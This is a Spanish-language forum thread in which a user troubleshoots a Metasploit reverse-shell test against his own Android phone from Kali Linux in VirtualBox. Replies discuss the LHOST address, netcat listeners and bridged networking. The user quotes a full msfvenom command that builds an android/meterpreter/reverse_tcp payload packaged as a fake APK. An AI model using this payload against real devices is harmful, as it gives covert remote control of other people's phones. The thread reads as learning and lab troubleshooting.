problema configuracion LHOST-en kali linux (virtualbox)

Iniciado por DammZ, Agosto 25, 2016, 06:51:16 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 25, 2016, 06:51:16 PM Ultima modificación: Agosto 25, 2016, 06:57:30 PM por S@nde
Bueno el problema es el siguiente, quiero hacer una prueba de exploit con mi movil android para ver si funciona y el problema es cuando configuro el LHOST que no se que ip poner porque cuando pongo ifconfig me sale lo siguiente:

+eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe7d:8ba9  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:7d:8b:a9  txqueuelen 1000  (Ethernet)
        RX packets 34328  bytes 31173780 (29.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13667  bytes 1195080 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 0  (Local Loopback)
        RX packets 28  bytes 1640 (1.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28  bytes 1640 (1.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

La duda es que ip pongo en LHOST? Probe con 10.0.2.15 , 192.168.1.17(pc windows10) y 127.0.0.1

El otro problema es que cuando inicio el exploit y abro la aplicación falsa en mi teléfono móvil, no ocurre nada en la terminal... se queda igual que sin abrir la aplicación (Todo esto lo hago con metasploit(como es normal) )

Esto me pasa también con ataques a otros pc, se queda igual

Saludos y muchas gracias :)

PD: Por cierto mi conexion es por cable ethernet


Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame
Pikaa~


127.0.0.1 siempre apunta a la misma maquina
10.0.2.15 es la que tenes que usar
la otra no se de donde la sacaste

para probarlo hace esto:
en la computadora corre sudo nc -lvvp 80
en el celular abri el navegador y entra a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta /
deberias ver una conexion en la consola donde abriste nc

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame

Me puedes explicar eso mas a fondo? Soy nuevo en esto de las máquinas virtuales

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
127.0.0.1 siempre apunta a la misma maquina
10.0.2.15 es la que tenes que usar
la otra no se de donde la sacaste

para probarlo hace esto:
en la computadora corre sudo nc -lvvp 80
en el celular abri el navegador y entra a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta /
deberias ver una conexion en la consola donde abriste nc

No me sale nada en la consola, activo el comando , luego abro No tienes permitido ver los links. Registrarse o Entrar a mi cuenta / en el celular y no ocurre nada en la terminal :/

Entra al msfconsole y despues de configurar todas las variables, haz un :

Código: php
show options


Comparte la salida por aqui.

Me huele a que todo el problema es una mal configuracion de los puertos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame

Normalmente vbox reparte direcciones 192.168..1.0/24 pero igual deberia funcionarte con cualquier otra direccion privada como 10.0.0.0/8 y 172.16.0.0/16.

Saludos.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Entra al msfconsole y despues de configurar todas las variables, haz un :

Código: php
show options


Comparte la salida por aqui.

Me huele a que todo el problema es una mal configuracion de los puertos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame

Normalmente vbox reparte direcciones 192.168..1.0/24 pero igual deberia funcionarte con cualquier otra direccion privada como 10.0.0.0/8 y 172.16.0.0/16.

Saludos.

Global Options:
===============

   Option            Current Setting    Description
   ------            ---------------    -----------
   ConsoleLogging    false              Log all console input and output
   LogLevel          0                  Verbosity of logs (default 0, max 3)
   MinimumRank       0                  The minimum rank of exploits that will run without explicit confirmation
   Prompt            msf                The prompt string
   PromptChar        >                  The prompt character
   PromptTimeFormat  %Y-%m-%d %H:%M:%S  Format for timestamp escapes in prompts
   SessionLogging    false              Log all input and output for sessions
   TimestampOutput   false              Prefix all console output with a timestamp


Me sale eso cuando pongo show options en msfconsole, como dijistes que funciona con la ip privada de 10.0.2.15 con esa ya probe y el archivo .apk al abrirse no hace nada la terminal no responde cuando se abre la apk

La apk fue creada en la terminal poniendo msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9999(NO se si este es el adecuado si pueden recomendarme uno os lo agradeceria) R > android.apk

Ok a ver...

Tienes metasploit en una maquina virtual? o en un equipo normal?
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ok a ver...

Tienes metasploit en una maquina virtual? o en un equipo normal?

En una máquina virtual (virtualbox) , mi pc es un windows 10

Pudiste solucionar tu problema? me esta pasando lo mismo, no se que ip usar

Buenas,

Si tienen problermas con las IPS, cambien la configuracion de red en su virtualbox de NAT a BRIDGE, cuando usan BRIDGE, podran llegar no solo a las maquinas virtuales que tienen corriendo en su virtualbox, si no tambien a todas los dispositivos que esten conectados en su router osea de manera LAN.

Saludos.